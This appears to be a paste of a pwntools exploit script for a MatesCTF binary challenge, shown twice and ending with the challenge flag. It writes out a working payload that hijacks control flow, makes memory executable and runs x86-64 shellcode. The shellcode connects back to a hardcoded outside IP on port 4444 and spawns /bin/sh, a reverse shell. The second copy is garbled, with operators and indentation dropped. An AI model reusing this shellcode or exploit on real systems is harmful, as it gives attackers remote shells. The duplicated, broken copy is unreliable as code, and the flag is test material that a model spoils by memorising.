H4niz · June 19, 2018 18:36
diff --git a/vul_app.py b/vul_app.py
 #!/usr/bin/env python


 from pwn import *



 io = process("./get_binary")

 context.clear()
 context.arch = "amd64"
 context.log_level = "debug"
 context.endian = "little"


 host = p32(0x675c1cd3)[::-1]
 port = "\x11\x5c"
 port1 = "\x7a\x69"


 shellcode =  "\x90"*0x34 + p64(0x40055c) + "\x90"*8


 shellcode += "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a"
 shellcode +=  "\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0"
 shellcode +=  "\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24"
 shellcode +=  "\x02"+port+"\xc7\x44\x24\x04"+host+"\x48\x89\xe6\x6a\x10"
 shellcode +=  "\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48"
 shellcode +=  "\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a"
 shellcode +=  "\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54"
 shellcode +=  "\x5f\x6a\x3b\x58\x0f\x05"
 shellcode += "\x90"*(0x200-len(shellcode))

 syscall = 0x400364
 read = 0x4002BB


 p = "\x0f\x00\x00\x00"
 p += p64(0x400520+4)
 p += p64(0x400350)
 p += p64(read)
 p += p64(0xa)
 p += p64(0x400000)
 p += p64(0x1000)
 p += p64(0x7)
 p += p64(0x400500)
 p += p64(0x100)
 p += p64(0)*3
 p += "\x90"*(0x64-len(p))
 # gdb.attach(io)

 # io.send(p)

 x = "\x90"*4
 x += p64(0x400520+4)
 x += p64(0x400374)
 x += p64(0x200)
 x += p64(0)*3
 x += "A"*(0x64-len(x))


 with open("./get_ol", "wb") as f:
 	f.write(p + x + shellcode)


 io.interactive()


 #MatesCTF{why_4m_1_s0_0bs3ss3d_w1th_bl1nd_RC3?}
	#!/usr/bin/env python


	from pwn import *



	io = process("./get_binary")

	context.clear()
	context.arch = "amd64"
	context.log_level = "debug"
	context.endian = "little"


	host = p32(0x675c1cd3)[::-1]
	port = "\x11\x5c"
	port1 = "\x7a\x69"


	shellcode = "\x90"0x34 + p64(0x40055c) + "\x90"8


	shellcode += "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a"
	shellcode += "\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0"
	shellcode += "\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24"
	shellcode += "\x02"+port+"\xc7\x44\x24\x04"+host+"\x48\x89\xe6\x6a\x10"
	shellcode += "\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48"
	shellcode += "\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a"
	shellcode += "\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54"
	shellcode += "\x5f\x6a\x3b\x58\x0f\x05"
	shellcode += "\x90"*(0x200-len(shellcode))

	syscall = 0x400364
	read = 0x4002BB


	p = "\x0f\x00\x00\x00"
	p += p64(0x400520+4)
	p += p64(0x400350)
	p += p64(read)
	p += p64(0xa)
	p += p64(0x400000)
	p += p64(0x1000)
	p += p64(0x7)
	p += p64(0x400500)
	p += p64(0x100)
	p += p64(0)*3
	p += "\x90"*(0x64-len(p))
	# gdb.attach(io)

	# io.send(p)

	x = "\x90"*4
	x += p64(0x400520+4)
	x += p64(0x400374)
	x += p64(0x200)
	x += p64(0)*3
	x += "A"*(0x64-len(x))


	with open("./get_ol", "wb") as f:
	f.write(p + x + shellcode)


	io.interactive()


	#MatesCTF{why_4m_1_s0_0bs3ss3d_w1th_bl1nd_RC3?}
No results found